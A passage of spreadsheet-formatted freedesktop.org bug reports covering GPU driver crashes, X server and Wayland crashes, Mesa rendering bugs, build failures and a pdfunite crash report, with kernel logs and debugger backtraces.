Feb 07 11:48:59 linuxsys kernel:  ? __sys_recvmsg+0x7d/0x90
Feb 07 11:48:59 linuxsys kernel:  SyS_ioctl+0x74/0x80
Feb 07 11:48:59 linuxsys kernel:  entry_SYSCALL_64_fastpath+0x20/0x83
Feb 07 11:48:59 linuxsys kernel: RIP: 0033:0x7f0bd74b3d87
Feb 07 11:48:59 linuxsys kernel: RSP: 002b:00007fff89afea38 EFLAGS: 00000246
Feb 07 11:48:59 linuxsys kernel: Code: e8 17 20 04 00 83 e8 4e 0f b6 d0 48 89 d0 48 c1 e0 05 48 01 d0 48 c1 e0 05 49 03 86 60 01 00 00 84 db 48 8b b8 78 02 00 00 74 18  8b 07 be 02 00 00 00 48 8b 80 d8 00 00 00 e8 6d 43 7e ee 84 
Feb 07 11:48:59 linuxsys kernel: RIP: dce110_vblank_set+0x4f/0xb0 [amdgpu] RSP: ffffb4e388c7bbe0
Feb 07 11:48:59 linuxsys kernel: CR2: 0000000000000000
Feb 07 11:48:59 linuxsys kernel: ---[ end trace 36522610c84ff0f3 ]---
The cause seems to be dce110_vblank_set+0x4f/0xb0 [amdgpu] with the topmost call trace being dce110_vblank_set+0x4f/0xb0 [amdgpu].
The bug report here which was closed last December resembled my current issue:
https://lists.freedesktop.org/archives/amd-gfx/2017-November/016236.html
I've thought about the possibility of it being DC-related as I saw similar bug reports but I was wrong as at one time I was able to reproduce it even after passing amdgpu.dc=0 during boot. The modules don't seem to be related as it happened on fresh installs where I left the screen blank (before I actually adjusted power management options) as I let it download and install packages I wanted in the background.
Additionally I'm able to find some additional errors prior to the crash which might have happened when the screen went blank. It could be done by simply locking the screen and leave it as is. (NOTE: When I locked the screen and then immediately move the mouse cursor to wake it up the crash would not occur. It would only occur if the screen went blank for at least 3-5 minutes.)
Feb 07 11:38:04 linuxsys kernel: [drm] {1920x1080 2080x1111@138700Khz}
Feb 07 11:38:12 linuxsys kernel: [drm] RBRx2 pass VS=1 PE=0
Feb 07 11:38:12 linuxsys kernel: [drm:dm_vblank_get_counter [amdgpu]] *ERROR* dc_stream_state is NULL for crtc '1'!
Feb 07 11:38:12 linuxsys kernel: [drm:dm_crtc_get_scanoutpos [amdgpu]] *ERROR* dc_stream_state is NULL for crtc '1'!
Feb 07 11:38:12 linuxsys kernel: [drm:dm_vblank_get_counter [amdgpu]] *ERROR* dc_stream_state is NULL for crtc '1'!
Feb 07 11:38:12 linuxsys kernel: WARNING: CPU: 12 PID: 1467 at drivers/gpu/drm/drm_vblank.c:612 drm_calc_vbltimestamp_from_scanoutpos+0x2c5/0x340 [drm]
Feb 07 11:38:12 linuxsys kernel: Modules linked in: vmw_vsock_vmci_transport vsock rfcomm fuse bnep vmnet(O) arc4 amdkfd nls_iso8859_1 amd_iommu_v2 nls_cp437 vfat fat amdgpu iwlmvm uvcvideo mac80211 videobuf2_vmalloc edac_mce_amd btusb vide
Feb 07 11:38:12 linuxsys kernel:  rng_core cryptd pcspkr k10temp i2c_piix4 shpchp battery wmi thermal ac tpm_crb tpm_tis tpm_tis_core video tpm asus_wireless i2c_hid button acpi_cpufreq sch_fq_codel vmmon(O) vmw_vmci vboxnetflt(O) vboxnetad
Feb 07 11:38:12 linuxsys kernel: CPU: 12 PID: 1467 Comm: xfwm4 Tainted: G           O     4.15.0-1-MANJARO #1
Feb 07 11:38:12 linuxsys kernel: Hardware name: ASUSTeK COMPUTER INC. GL702ZC/GL702ZC BIOS GL702ZC.303 12/15/2017
Feb 07 11:38:12 linuxsys kernel: RIP: 0010:drm_calc_vbltimestamp_from_scanoutpos+0x2c5/0x340 [drm]
Feb 07 11:38:12 linuxsys kernel: RSP: 0018:ffffb4e388c7bb50 EFLAGS: 00010086
Feb 07 11:38:12 linuxsys kernel: RAX: ffffffffc12b04c0 RBX: ffff9b4b3ab4c800 RCX: 0000000000000001
Feb 07 11:38:12 linuxsys kernel: RDX: ffffffffc0941068 RSI: 0000000000000001 RDI: ffffffffc093f0d8
Feb 07 11:38:12 linuxsys kernel: RBP: ffffb4e388c7bbb8 R08: 0000000000000000 R09: ffffffffc09214a0
Feb 07 11:38:12 linuxsys kernel: R10: ffffffffc10d6320 R11: ffffffffb056c36d R12: 0000000000000001
Feb 07 11:38:12 linuxsys kernel: R13: ffffb4e388c7bbcc R14: ffffb4e388c7bc00 R15: ffff9b4b2ba84000
Feb 07 11:38:12 linuxsys kernel: FS:  00007f0bdae66980(0000) GS:ffff9b4b3e900000(0000) knlGS:0000000000000000
Feb 07 11:38:12 linuxsys kernel: CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Feb 07 11:38:12 linuxsys kernel: CR2: 00007f9ee41080b0 CR3: 00000007d96c8000 CR4: 00000000003406e0
Feb 07 11:38:12 linuxsys kernel: Call Trace:
Feb 07 11:38:12 linuxsys kernel:  drm_get_last_vbltimestamp+0x54/0x90 [drm]
Feb 07 11:38:12 linuxsys kernel:  drm_update_vblank_count+0x77/0x250 [drm]
Feb 07 11:38:12 linuxsys kernel:  drm_vblank_enable+0xbd/0x100 [drm]
Feb 07 11:38:12 linuxsys kernel:  drm_vblank_get+0x8d/0xb0 [drm]
Feb 07 11:38:12 linuxsys kernel:  drm_wait_vblank_ioctl+0x12a/0x690 [drm]
Feb 07 11:38:12 linuxsys kernel:  ? unix_stream_recvmsg+0x53/0x70
Feb 07 11:38:12 linuxsys kernel:  ? drm_legacy_modeset_ctl_ioctl+0x100/0x100 [drm]
Feb 07 11:38:12 linuxsys kernel:  drm_ioctl_kernel+0x5b/0xb0 [drm]
Feb 07 11:38:12 linuxsys kernel:  drm_ioctl+0x2d5/0x370 [drm]
Feb 07 11:38:12 linuxsys kernel:  ? drm_legacy_modeset_ctl_ioctl+0x100/0x100 [drm]
Feb 07 11:38:12 linuxsys kernel:  ? do_iter_write+0xdc/0x190
Feb 07 11:38:12 linuxsys kernel:  ? vfs_writev+0xb9/0x110
Feb 07 11:38:12 linuxsys kernel:  amdgpu_drm_ioctl+0x49/0x80 [amdgpu]
Feb 07 11:38:12 linuxsys kernel:  do_vfs_ioctl+0xa4/0x630
Feb 07 11:38:12 linuxsys kernel:  ? __sys_recvmsg+0x4e/0x90
Feb 07 11:38:12 linuxsys kernel:  ? __sys_recvmsg+0x7d/0x90
Feb 07 11:38:12 linuxsys kernel:  SyS_ioctl+0x74/0x80
Feb 07 11:38:12 linuxsys kernel:  entry_SYSCALL_64_fastpath+0x20/0x83
Feb 07 11:38:12 linuxsys kernel: RIP: 0033:0x7f0bd74b3d87
Feb 07 11:38:12 linuxsys kernel: RSP: 002b:00007fff89afea38 EFLAGS: 00000246
Feb 07 11:38:12 linuxsys kernel: Code: e1 48 c7 c2 68 10 94 c0 be 01 00 00 00 48 c7 c7 d8 f0 93 c0 e8 1d 66 fe ff 48 8b 83 98 03 00 00 48 83 78 20 00 0f 84 6f fd ff ff  ff e9 68 fd ff ff 48 c7 c2 30 10 94 c0 31 f6 48 c7 c7 d5 f0 
Feb 07 11:38:12 linuxsys kernel: ---[ end trace 36522610c84ff0f2 ]---
Feb 07 11:38:12 linuxsys kernel: [drm:dm_vblank_get_counter [amdgpu]] *ERROR* dc_stream_state is NULL for crtc '1'!
Feb 07 11:38:12 linuxsys kernel: [drm:dm_crtc_get_scanoutpos [amdgpu]] *ERROR* dc_stream_state is NULL for crtc '1'!
Feb 07 11:38:12 linuxsys kernel: [drm:dm_vblank_get_counter [amdgpu]] *ERROR* dc_stream_state is NULL for crtc '1'!
Feb 07 11:38:20 linuxsys kernel: [drm:dm_vblank_get_counter [amdgpu]] *ERROR* dc_stream_state is NULL for crtc '1'!
Feb 07 11:38:20 linuxsys kernel: [drm:dm_crtc_get_scanoutpos [amdgpu]] *ERROR* dc_stream_state is NULL for crtc '1'!
Feb 07 11:38:20 linuxsys kernel: [drm:dm_vblank_get_counter [amdgpu]] *ERROR* dc_stream_state is NULL for crtc '1'!
Feb 07 11:38:20 linuxsys kernel: [drm:dm_vblank_get_counter [amdgpu]] *ERROR* dc_stream_state is NULL for crtc '1'!
Feb 07 11:38:20 linuxsys kernel: [drm:dm_crtc_get_scanoutpos [amdgpu]] *ERROR* dc_stream_state is NULL for crtc '1'!
Feb 07 11:38:20 linuxsys kernel: [drm:dm_vblank_get_counter [amdgpu]] *ERROR* dc_stream_state is NULL for crtc '1'!
For now I could only prevent the panic from happening by not allowing power saving functions to happen especially anything that would turn off the screen. I'm also not allowed to lock the screen it would also blank the screen and the GTK+ greeter could blank the screen in its own way. 
However it's not feasible for running the system on battery for an extended period without any power saving feature given the high total TDP the laptop has and leaving the system unlocked is a bad idea in terms of security and privacy.
By the way given there were a few similar closed bug reports in the past I believe the problem might be a regression.</t>
  </si>
  <si>
    <t>ragnaros39216</t>
  </si>
  <si>
    <t>XORG-4436</t>
  </si>
  <si>
    <t>Crashes on resume from ACPI standby</t>
  </si>
  <si>
    <t>I have a dell c640 laptop using a radeon mobility 7500. 
If I close the lid and open it again the X server crashes.
The following is found in Xorg.0.log:
Backtrace:
0: /usr/X11R6/bin/X(xf86SigHandler+0x8a) [0x80887da]
1: [0xffffe420]
2: /lib/tls/libc.so.6(__strtoul_internal+0x48) [0xb7de5f08]
3: /usr/X11R6/bin/X [0x80a6042]
4: /usr/X11R6/bin/X(xf86HandlePMEvents+0x39) [0x80b7b29]
5: /usr/X11R6/bin/X(xf86Wakeup+0x32a) [0x8088c3a]
6: /usr/X11R6/bin/X(WakeupHandler+0x3e) [0x80c7d3e]
7: /usr/X11R6/bin/X(WaitForSomething+0x1ae) [0x80e556e]
8: /usr/X11R6/bin/X(Dispatch+0x75) [0x80c7365]
9: /usr/X11R6/bin/X(main+0x3ed) [0x80d3c9d]
10: /lib/tls/libc.so.6(__libc_start_main+0xdb) [0xb7dcefcb]
11: /usr/X11R6/bin/X [0x806fd61]
xorg was compiled using gcc 3.4.4 and the linuxkernel is 2.6.13. Using the
slackware-current distribution.</t>
  </si>
  <si>
    <t>CAIRO-15652</t>
  </si>
  <si>
    <t>directfb backend</t>
  </si>
  <si>
    <t>[directfb] Regression in 1.6 making gtk/directfb not repaint changed window areas correctly</t>
  </si>
  <si>
    <t>Quoting http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=477331:
=============================================================
I just tested the graphical installer with the new libraries and I'm
afraid there's a serious regression. It looks like old screen content is
not getting wiped when new elements get displayed.
As cairo is the only library to have changed recently I'm fairly
certain that the cause is there possibly related to the breaking out of
libpixman. I've uploaded some screenshots to show the issue.
Initial screen after boot (no problems):
- http://people.debian.org/~fjp/tmp/d-i/cairo-regression1.png
After scrolling up in the list previously selected lines should not be red:
- http://people.debian.org/~fjp/tmp/d-i/cairo-regression2.png
After scrilling down to English again the red partly disappears except
for the two thin lines around Dutch and a line in the left margin:
- http://people.debian.org/~fjp/tmp/d-i/cairo-regression3.png
The next screen still shows text from the previous one (Choose a
language: and the dot under the s in Based:
- http://people.debian.org/~fjp/tmp/d-i/cairo-regression4.png
This is the clearest example. It should only be showing a progress bar
but instead still has the full previous dialog and all progress info is
printed on top of itself resulting in the almost black bar:
- http://people.debian.org/~fjp/tmp/d-i/cairo-regression5.png
Note that the installer used a directfb backend not X.
=============================================================
The version it worked with was 1.4.14 the version that had this behaviour is 1.6.4. Nothing else was updated so it's most likely a regression in cairo.</t>
  </si>
  <si>
    <t>XORG-21366</t>
  </si>
  <si>
    <t>[G45 UXA] Large image scaled in Gecko causes Xorg hang</t>
  </si>
  <si>
    <t>Created attachment 25072
backtrace of the hang
When the image at the URL below is loaded in my browser (Epiphany with the Gecko backend) and then scaled (by clicking on it) Xorg hangs. The display freezes but I can still move the cursor around the Xorg process starts using 100% CPU.
http://farm4.static.flickr.com/3310/3408925371_daedab3e47_o.jpg
I'm not using KMS at the moment.
System environment:
-- chipset: G45 / ICH10R
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- Machine or mobo model: Asus P5Q-EM
-- Display connector: DVI
-- xf86-video-intel: 2.7.0
-- xserver: 1.6.0
-- mesa: 7.4
-- drm: 2.4.9
-- kernel: 2.6.29 (debian package)</t>
  </si>
  <si>
    <t>XDG-APP-91165</t>
  </si>
  <si>
    <t>helper: Add all possible architectures to seccomp filter</t>
  </si>
  <si>
    <t>Ensure that the seccomp filters will be applied if someone tries to run
a non-native architecture program. This currently only covers the
various x86 architectures and was borrowed from systemd LGPL code.</t>
  </si>
  <si>
    <t>MESA-2010</t>
  </si>
  <si>
    <t>depth and stencil readback are broken beyond x &gt; 1023</t>
  </si>
  <si>
    <t>depth and stencil readback are broken on r200 based cards beyond x coordinate
1023 (and I believe y coordinate too but not tested) (Mesa tests zreaddraw
stencilwrap move them to out of the right border on a 1280x1024 desktop and
back in to get a redraw). This appears to be caused by the r200_mba_z16 and
r200_mga_z32 functions in r200_span.c which use masks (y &amp; 0x3FF) and (x &amp;
0x3FF) respectively which will limit addressing to coordinates lower than 1024.
I'm not sure what the correct fix would be though using 0x7FF (2047 which is
the 3d hardware limit for a single cliprect) solves the issue. But since this
just calculates a memory address why is a mask even needed?</t>
  </si>
  <si>
    <t>DRI-101515</t>
  </si>
  <si>
    <t>[BAT][SKL] *ERROR* Failed to get link status</t>
  </si>
  <si>
    <t>The machine fi-skl-6700hq started randomly generating the dmesg error message [drm:intel_dp_check_link_status [i915]] *ERROR* Failed to get link status.
First seen on IGT_1218 (based on CI_DRM_2742): http://benchsrv.fi.intel.com/archive/results/CI_IGT_test/IGT_1218/fi-skl-6700hq/igt@prime_busy@basic-wait-after-default.html
This however does not seem to be due to an IGT change:
http://benchsrv.fi.intel.com/archive/results/CI_IGT_test/IGT_1218/commits_short.log
It all looks like the fi-skl-6700hq is dying slowly but surely :D</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-68995</t>
  </si>
  <si>
    <t>replacing deprecated key symbols with standard ones</t>
  </si>
  <si>
    <t>Created attachment 85280
replaces the non-quote key symbols
The key symbols 'quoteleft' and 'quoteright' have been deprecated since Xorg began in November 2003.  It seems about time to stop using them.  :)  Attached patch replaces them with the standard 'grave' and 'apostrophe' symbols.</t>
  </si>
  <si>
    <t>XORG-757</t>
  </si>
  <si>
    <t>Motif changes to linux.cf break build for most linux users</t>
  </si>
  <si>
    <t>The XPRINT merge added lines to linux.cf FreeBSD.cf and NetBSD.cf to define
HasMotif YES.  However this is not the case on most of our users' machines and
has created a decent bit of support load on irc with people getting errors about
Xm includes.  Seems like we ought to apply the following and let people set
HasMotif if they actually have it. (untested)</t>
  </si>
  <si>
    <t>PACKAGEKIT-16432</t>
  </si>
  <si>
    <t>backend-apt</t>
  </si>
  <si>
    <t>Fix Apt backend's doResolve()</t>
  </si>
  <si>
    <t>Created attachment 17232
Fix apt backend doResolve()
Apt backend's doResolve() in 0.2.2 has two bugs which break it completely and thus make the apt backend unusable:
 * is_package_visible() does not exist it should be _is_package_visible()
 * function receives a string name (in particular a Dbus.String) but tries to pass it to _is_package_visible() and _emit_package(). Those expect a package object from apt.Cache() though.
Attached patch fixes both. Now standard operations like search install remove get-details etc. work fine.</t>
  </si>
  <si>
    <t>FARSTREAM-95210</t>
  </si>
  <si>
    <t>Documentation failing to build</t>
  </si>
  <si>
    <t>Hello
We got two reports that the documentation were FTBFS in debian:
&gt; sbuild (Debian sbuild) 0.68.0 (15 Jan 2016) on dl580gen9-02.hlinux
...
&gt; make[4]: Entering directory '/&gt;/docs/libs'
&gt;   DOC   Scanning header files
&gt;   DOC   Introspecting gobjects
&gt;   DOC   Building XML
&gt; Negative repeat count does nothing at /usr/bin/gtkdoc-mkdb line 3812  line 205.
&gt;   DOC   Building HTML
&gt; mv: cannot stat 'html/index.sgml': No such file or directory
&gt; Makefile:755: recipe for target 'html-build.stamp' failed
&gt; make[4]: *** [html-build.stamp] Error 1
I can confirm this with 0.2.8 too
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=822387
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=819836</t>
  </si>
  <si>
    <t>MESA-93247</t>
  </si>
  <si>
    <t>Bound by Flame game crashes GPU</t>
  </si>
  <si>
    <t>Created attachment 120332
Messages printed into the journalctl log about this crash
I'm trying to run this newly released game ( http://store.steampowered.com/app/243930/ ) on this PC:
CPU AMD A10-7850K 8 GB Ram
ATI Radeon 7850 1Gb
Mesa 11.0.6
xf86-video-ati 7.5.0
linux kernel 4.2.6
Distro is Manjaro Linux.
The game is 32 bit and I'm using native 32 bit libraries instead of the ones supplied by the Steam SDK.
The game crashes on the loading screen after the start game and intro sequence.
I had to reset my PC.</t>
  </si>
  <si>
    <t>l.gambetta</t>
  </si>
  <si>
    <t>MESA-68224</t>
  </si>
  <si>
    <t>[radeonsi] Serious Sam3 is segfaulting (LLVM assert)</t>
  </si>
  <si>
    <t>Created attachment 84175
shader dump from Serious Sam 3  with RADEON_DUMP_SHADERS=1
* mesa:
  OpenGL renderer string: Gallium 0.4 on AMD PITCAIRN
  OpenGL version string: 2.1 Mesa 9.3.0-devel (git-703a2f4)
* llvm-3.4svn r188604
The game segfault just before the logo shows up:
Starting program: /home/lordh/.local/share/Steam/SteamApps/common/Serious Sam 3/Bin/Sam3.orig 
warning: Could not load shared library symbols for linux-gate.so.1.
Do you need set solib-search-path or set sysroot?
[Thread debugging using libthread_db enabled]
Using host libthread_db library /usr/lib/libthread_db.so.1.
cat: /etc/debian_version: Aucun fichier ou dossier de ce type
Setting breakpad minidump AppID = 41070
Steam_SetMinidumpSteamID:  Caching Steam ID:  76561197992653503 [API loaded no]
[New Thread 0xf5914b40 (LWP 6689)]
[New Thread 0xf14acb40 (LWP 6693)]
AL lib: pulseaudio.c:612: Context did not connect: Access denied
[New Thread 0xeff0ab40 (LWP 6698)]
[Thread 0xeff0ab40 (LWP 6698) exited]
AL lib: pulseaudio.c:612: Context did not connect: Access denied
[New Thread 0xeff0ab40 (LWP 6699)]
[Thread 0xeff0ab40 (LWP 6699) exited]
AL lib: pulseaudio.c:612: Context did not connect: Access denied
[New Thread 0xeff0ab40 (LWP 6700)]
[New Thread 0xef0e9b40 (LWP 6701)]
[New Thread 0xee832b40 (LWP 6702)]
[Thread 0xee832b40 (LWP 6702) exited]
Installing breakpad exception handler for appid(gameoverlayui)/version(20130816170723_client)
Installing breakpad exception handler for appid(gameoverlayui)/version(1.0_client)
Installing breakpad exception handler for appid(gameoverlayui)/version(1.0_client)
Installing breakpad exception handler for appid(gameoverlayui)/version(1.0_client)
[0817/170723:WARNING:proxy_service.cc(958)] PAC support disabled because there is no system implementation
Sam3.orig: AMDGPUInstrInfo.cpp:109: virtual void llvm::AMDGPUInstrInfo::storeRegToStackSlot(llvm::MachineBasicBlock&amp; llvm::MachineBasicBlock::iterator unsigned int bool int const llvm::TargetRegisterClass* const llvm::TargetRegisterInfo*) const: Assertion `!Not Implemented' failed.
* gdb backstrace:
#0  0xf7fdb425 in __kernel_vsyscall ()
#1  0xf7d6f7e6 in raise () from /usr/lib32/libc.so.6
#2  0xf7d70f73 in abort () from /usr/lib32/libc.so.6
#3  0xf7d687d7 in __assert_fail_base () from /usr/lib32/libc.so.6
#4  0xf7d68887 in __assert_fail () from /usr/lib32/libc.so.6
#5  0xf17a86a9 in llvm::AMDGPUInstrInfo::storeRegToStackSlot(llvm::MachineBasicBlock&amp; llvm::MachineBasicBlock::bundle_iterator &gt; unsigned int bool int llvm::TargetRegisterClass const* llvm::TargetRegisterInfo const*) const () from /usr/lib32/libLLVM-3.4svn.so
#6  0xf1d50389 in ?? () from /usr/lib32/libLLVM-3.4svn.so
#7  0xf1d52773 in ?? () from /usr/lib32/libLLVM-3.4svn.so
#8  0xf1e6aafe in ?? () from /usr/lib32/libLLVM-3.4svn.so
#9  0xf1e595ad in llvm::RegAllocBase::allocatePhysRegs() () from /usr/lib32/libLLVM-3.4svn.so
#10 0xf1e6e099 in ?? () from /usr/lib32/libLLVM-3.4svn.so
#11 0xf1dd2d52 in llvm::MachineFunctionPass::runOnFunction(llvm::Function&amp;) () from /usr/lib32/libLLVM-3.4svn.so
#12 0xf1a0973f in llvm::FPPassManager::runOnFunction(llvm::Function&amp;) () from /usr/lib32/libLLVM-3.4svn.so
#13 0xf1a09b68 in llvm::FPPassManager::runOnModule(llvm::Module&amp;) () from /usr/lib32/libLLVM-3.4svn.so
#14 0xf1a09e1c in llvm::MPPassManager::runOnModule(llvm::Module&amp;) () from /usr/lib32/libLLVM-3.4svn.so
#15 0xf1a0a05b in llvm::PassManagerImpl::run(llvm::Module&amp;) () from /usr/lib32/libLLVM-3.4svn.so
#16 0xf1a0a166 in llvm::PassManager::run(llvm::Module&amp;) () from /usr/lib32/libLLVM-3.4svn.so
#17 0xf1f42937 in ?? () from /usr/lib32/libLLVM-3.4svn.so
#18 0xf1f42cc0 in LLVMTargetMachineEmitToMemoryBuffer () from /usr/lib32/libLLVM-3.4svn.so
#19 0xf36c9b47 in radeon_llvm_compile (M=M@entry=0x14da15b8 binary=binary@entry=0xffff5ed4 gpu_family=0xf38653d2 pitcairn dump=dump@entry=0) at radeon_llvm_emit.c:124
#20 0xf36bbd82 in si_compile_llvm (rctx=rctx@entry=0x9845218 shader=shader@entry=0x14da88f8 mod=0x14da15b8) at radeonsi_shader.c:1478
#21 0xf36bc5cd in si_pipe_shader_create (ctx=ctx@entry=0x9845218 shader=shader@entry=0x14da88f8) at radeonsi_shader.c:1620
#22 0xf36c5576 in si_shader_select (ctx=ctx@entry=0x9845218 sel=sel@entry=0x14e27610 dirty=dirty@entry=0x0) at si_state.c:2393
#23 0xf36c58bb in si_create_shader_state (ctx=0x9845218 state= pipe_shader_type=1) at si_state.c:2435
#24 0xf34f9313 in st_translate_fragment_program (st=st@entry=0x98c45a8 stfp=stfp@entry=0x14ed0c58 key=key@entry=0xffffb148) at ../../src/mesa/state_tracker/st_program.c:768
#25 0xf34fa6f6 in st_get_fp_variant (st=st@entry=0x98c45a8 stfp=stfp@entry=0x14ed0c58 key=key@entry=0xffffb148) at ../../src/mesa/state_tracker/st_program.c:805
#26 0xf34c1f33 in update_fp (st=0x98c45a8) at ../../src/mesa/state_tracker/st_atom_shader.c:92
#27 0xf34be81e in st_validate_state (st=st@entry=0x98c45a8) at ../../src/mesa/state_tracker/st_atom.c:221
#28 0xf34d5eac in st_draw_vbo (ctx=0x98e7760 prims=0xffffb298 nr_prims=1 ib=0xffffb288 index_bounds_valid=1 '\001' min_index=0 max_index=3 tfb_vertcount=0x0) at ../../src/mesa/state_tracker/st_draw.c:210
#29 0xf34a92f9 in vbo_handle_primitive_restart (ctx=ctx@entry=0x98e7760 prim=prim@entry=0xffffb298 nr_prims=nr_prims@entry=1 ib=ib@entry=0xffffb288 index_bounds_valid=index_bounds_valid@entry=1 '\001' min_index=min_index@entry=0 
    max_index=max_index@entry=3) at ../../src/mesa/vbo/vbo_exec_array.c:585
#30 0xf34aa4a9 in vbo_validated_drawrangeelements (ctx=ctx@entry=0x98e7760 mode=mode@entry=4 index_bounds_valid=index_bounds_valid@entry=1 '\001' start=start@entry=0 end=end@entry=3 count=count@entry=6 type=type@entry=5123 
    indices=indices@entry=0x0 basevertex=basevertex@entry=0 numInstances=numInstances@entry=1 baseInstance=baseInstance@entry=0) at ../../src/mesa/vbo/vbo_exec_array.c:1004
#31 0xf34aa8a4 in vbo_exec_DrawRangeElementsBaseVertex (mode=mode@entry=4 start=start@entry=0 end=end@entry=3 count=count@entry=6 type=type@entry=5123 indices=indices@entry=0x0 basevertex=basevertex@entry=0)
    at ../../src/mesa/vbo/vbo_exec_array.c:1112
#32 0xf34aa99f in vbo_exec_DrawRangeElements (mode=4 start=0 end=3 count=6 type=5123 indices=0x0) at ../../src/mesa/vbo/vbo_exec_array.c:1132</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-62412</t>
  </si>
  <si>
    <t>Can't log in to www.freedesktop.org wiki</t>
  </si>
  <si>
    <t>I can't log in to the www.freedesktop.org wiki. My account is TanuKaskinen. Please re-enable the account if it's possible. The way I read the message on the front page suggests that it's not possible though:
we've eliminated the ability to login to the wiki as our attempts to disable account creation have never worked correctly
We want to move from a web-based wiki to a git-based wiki the plan is to use ikiwiki for this. We won't have any cgi-based editing the only way to get changes into a wiki will be to push changes to a git repository which will have a hook to rebuild the visible version.
if you're clever you can update wiki pages by manually constructing them in the moin/data/pages directories (that's how this page was edited)
Is it so that wiki editing is disabled forever without the git-based replacement yet in place? If I want to create a wiki page for this year's GSoC project proposals for PulseAudio in the very near future am I expected to find another wiki hosting service for that?</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-16409</t>
  </si>
  <si>
    <t>windows animated cursors (.ani)</t>
  </si>
  <si>
    <t>gdk-pixbuf supports the format for windows animated cursors shared-mime-info doesn't know it. It would be good to add it since I plan to make gdk-pixbuf use gio (and thus shared-mime-info indirectly) for sniffing.
Here is the relevant excerpt from the pixbuf loader:
        static GdkPixbufModulePattern signature[] = {
                { RIFF    ACON     xxxx     100 }
                { NULL NULL 0 }
        }
        static gchar * mime_types[] = {
                application/x-navi-animation
                NULL
        }
        static gchar * extensions[] = {
                ani
                NULL
        }
        info-&gt;name = ani</t>
  </si>
  <si>
    <t>MESA-108565</t>
  </si>
  <si>
    <t>Rise of the Tomb Raider SIGSEGV in LLVM 7.0.0</t>
  </si>
  <si>
    <t>Created attachment 142219
gdb backtrace.txt
The game crashes when continuing the game from the main menu.
Deleting all folders and files in the ~/.cache/mesa_shader_cache/ and ~/.steam/root/steamapps/shadercache/391220/ folders does NOT fix this bug.
Mesa: 18.2.3
LLVM: 7.0.0-r1 (Gentoo Linux)
Linux kernel: 4.19
GPU: R9 390</t>
  </si>
  <si>
    <t>REALMD-64542</t>
  </si>
  <si>
    <t>Enable services even when in install mode</t>
  </si>
  <si>
    <t>We don't restart/stop services when in install mode but we should enable/disable them so that on the next boot they are as expected.</t>
  </si>
  <si>
    <t>ACCOUNTSSERVICE-33678</t>
  </si>
  <si>
    <t>Czech translation</t>
  </si>
  <si>
    <t>Created attachment 42684
Czech translation
Here is Czech translation for accountsservice. Could you please commit it?</t>
  </si>
  <si>
    <t>marek</t>
  </si>
  <si>
    <t>POPPLER-101208</t>
  </si>
  <si>
    <t>[pdfunite] crash due to a recursive call of two functions that exhausts the call stack</t>
  </si>
  <si>
    <t>Created attachment 131533
analysis_and_PoC
## Summary
pdfunite util in poppler-0.55.0 will crash when parsing a crafted pdf file because the program fall into a recursive and interactive call of two functions and eventually exhaust the stack space.
## Reproduce
pengjiaqi@ubuntu:~/Documents/crash/poppler-0.55.0ild-gcc/utils$ ./pdfunite PoC.pdf 1.pdf
Segmentation fault
## Analysis
Due to the analysis is a little complex I have uploaded it as an attachment along with a PoC. In order to avoid disclosing it before patch is released I have encrypted it. The developers can communicate with me to get the password.
## Author
name: Jiaqi Peng
email: pjqruc@gmail.com</t>
  </si>
  <si>
    <t>pengjiaqi</t>
  </si>
  <si>
    <t>PULSEAUDIO-90936</t>
  </si>
  <si>
    <t>git-version-gen marks tarballs as dirty if build inside a dirty git clone</t>
  </si>
  <si>
    <t>Say I have a distro build system in git which builds packages in a working directory in the git checkout:
~/mydistro/builds/pulseaudio-6.0/[tarball contents]
git-version-gen will read the version from .tarball-version and then try running git diff-index at which point git will iterate up until it finds ~/mydistro/.git/ and report that the repo is dirty resulting in a build of Pulseaudio that thinks its version 6.0-dirty.  Obviously this isn't right.</t>
  </si>
  <si>
    <t>MESA-3165</t>
  </si>
  <si>
    <t>texImage.IsCompressed and texImage.CompressedSize issues</t>
  </si>
  <si>
    <t>texImage.IsCompressed and texImage.CompressedSize are set in
_mesa_init_teximage_fields based on the texture's internalFormat specified by
the application. However the driver may want to choose an uncompressed format
instead of a compressed one or it may want to compress textures with e.g.
internalFormat=GL_COMPRESSED_RGBA which is not recognized as compressed right
now. In such cases IsCompressed ends up being clearly wrong and leads to weird
crashes later on. I suspect that wrong texture image sizes and/or row strides in
_mesa_store_teximage_... are responsible.
I believe texImage.IsCompressed and texImage.CompressedSize should be
initialized after the driver has chosen a hardware texture format and based on
that hardware format instead of the internalFormat specified by the application.
Does that make sense or am I trying to do something stupid?</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-59840</t>
  </si>
  <si>
    <t>Language codes displayed instead of full name</t>
  </si>
  <si>
    <t xml:space="preserve">Created attachment 73635
Screenshot of the language filter list from the Add Layout dialog box
A dialog box in KDE Keyboard Layout allows to filter layouts by their language. In this list are 4 entries named simply: fr mng scr and trv (see screenshot).
fr contains:
- a duplicate of the French (Canada) layout also found under French
- a Bambara layout only available under the fr language entry despite the fact that the Bambara language is listed. Maybe the one under fr should be moved to the Bambara entry uniting the French and English layouts?
The other 3 are either wrongly labelled or incorrectly linked to the layouts they contain. Presently mng is tied to the Mongolian layout scr has Croatian and trv Taiwanese. But according to the iso-codes bug report linked below: mng is Eastern Mnong scr is a retired code for Croatian and trv is Taroko.
Since KDE and iso-codes deny being the source of this problem xkeyboard-config seems to be the only one remaining.
Tested with xkeyboard-config 2.7 and iso-codes 3.38 and 3.40.
Original KDE bug report: 
iso-codes bug report: </t>
  </si>
  <si>
    <t>pierre.buard+freedesktop</t>
  </si>
  <si>
    <t>WAYLAND-79609</t>
  </si>
  <si>
    <t>VT switching crashes Xwayland and weston</t>
  </si>
  <si>
    <t>Xwayland will crash under some actions on my computer.
Steps to reproduce:
1. weston-launch from a VT
2. Start weston-terminal
3. Launch an app that needs X from weston-terminal (glxgears for example)
4. Switch to another VT and switch back
5. Move mouse onto the X window (glxgears)
Then that X window will fade out (crashes) after the X window fade out completely weston will crash too.
It is 100 percent reproducible on my machine
Environment:
Weston 1.5.0
Xwayland (HEAD) 1.15.99.902-0-g7ca4584
mesa 10.2-rc1
Following is the weston log generated from the steps above</t>
  </si>
  <si>
